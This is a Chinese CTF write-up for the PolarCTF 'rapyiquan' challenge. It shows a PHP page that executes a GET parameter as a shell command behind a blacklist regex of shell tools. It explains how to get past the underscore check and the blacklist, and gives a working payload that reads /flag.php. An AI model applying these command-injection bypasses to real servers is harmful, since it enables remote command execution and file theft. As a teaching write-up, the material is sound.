【PolarCTF】rapyiquan

复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);
header('content-type:text/html;charset=utf-8');

$url = $_SERVER['REQUEST_URI'];
# strpos(原始字符串, 要查找的字符, [开始查找的位置])
# 表示需要匹配到_
function checkUrlParams($params) {
        if (strpos($params, '_') !== false) {
            return false;
        }
    return true;
}

if(checkUrlParams($url)){
    $cmd=$_GET['c_md'];
    if (preg_match("/ls|dir|flag|type|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
        echo("badly!");
    } else {
        echo `$cmd`;
    }
}else{
    echo "$url";
    echo "<br>";
    echo "Hack";
}

首先我们需要绕过checkUrlParams()函数,就是我们的url中不能出现_

但是GET用来传递的参数又是c_md那么我们就要想办法绕过

参数_符号的替代

我们可以使用下面3种情况来进行代替

复制代码
?c.md=whoami
?c[md=whoami
?c%20md=whoami

因为空格(%20)、点号、左方括号,在 PHP 解析 GET/POST 参数名时,会被自动换成下划线 _

使用\拆分命令绕过正则

接下来就是绕过正则表达式

复制代码
if (preg_match("/ls|dir|flag|type|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
        echo("badly!");
    } else {
        echo `$cmd`;
    }
}else{
    echo "$url";
    echo "<br>";
    echo "Hack";
}

这里我们可以使用\拆分技巧

在linux中有一个规则:

反斜杠 \ + 普通字符 = 普通字符

那么就是说

复制代码
c\at → cat
ca\t → cat
c\a\t → cat

但是这里有一个疑问,明明正则表达式是会过滤\为什么没有拦截

重点看这里

复制代码
\\|\\\\|

这行在 PHP 里最终解析成:

只匹配:一个反斜杠 \

而我们传入的是

复制代码
ca\t

这里的 \t 是 两个字符:\ + t

而不是单个\,因此绕过了正则表达式

通过下面的演示图就可以明显看到,正则表达式会把\s看成一起的从而绕过了正则表达式,但是在linux中又是支持\的写法的

然后我们直接读取/flag.php里面的内容

复制代码
?c[md=ca\t%20/f\lag.php

flag在网页源代码中

或者使用tac命令也是可以的,flag会直接出现在网页上

疑问:为什么tac会直接输出flag到网页上

相关推荐
锐速网络14 小时前
SaaS云防护:DDoS/CC/爬虫一站式解决方案
网络安全·云waf·ddos防护·企业网站防护·saas云防护·cc攻击防护·恶意爬虫拦截
Chockmans1 天前
春秋云境CVE-2020-21652(极速版)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2020-21652
C2H5OH1 天前
PortSwigger SQL注入LAB10
网络安全
汤愈韬1 天前
IPSec工作原理——TK
网络·网络协议·网络安全·security
treesforest1 天前
机房IP是什么?有什么危害?如何识别?
网络·数据库·python·网络协议·tcp/ip·网络安全
HackTwoHub1 天前
AI赋能Chrome MCP × JS逆向Skill自动化JS逆向挖洞
javascript·人工智能·chrome·安全·web安全·网络安全·自动化
pencek1 天前
HakcMyVM-Canto
网络安全
24kmaigc1 天前
NewStarCTF2025-ssti在哪里?-ssrf与ssti注入
python·网络安全·flask·web
AIDABI1 天前
Vulnhub-DC-9
web安全·网络安全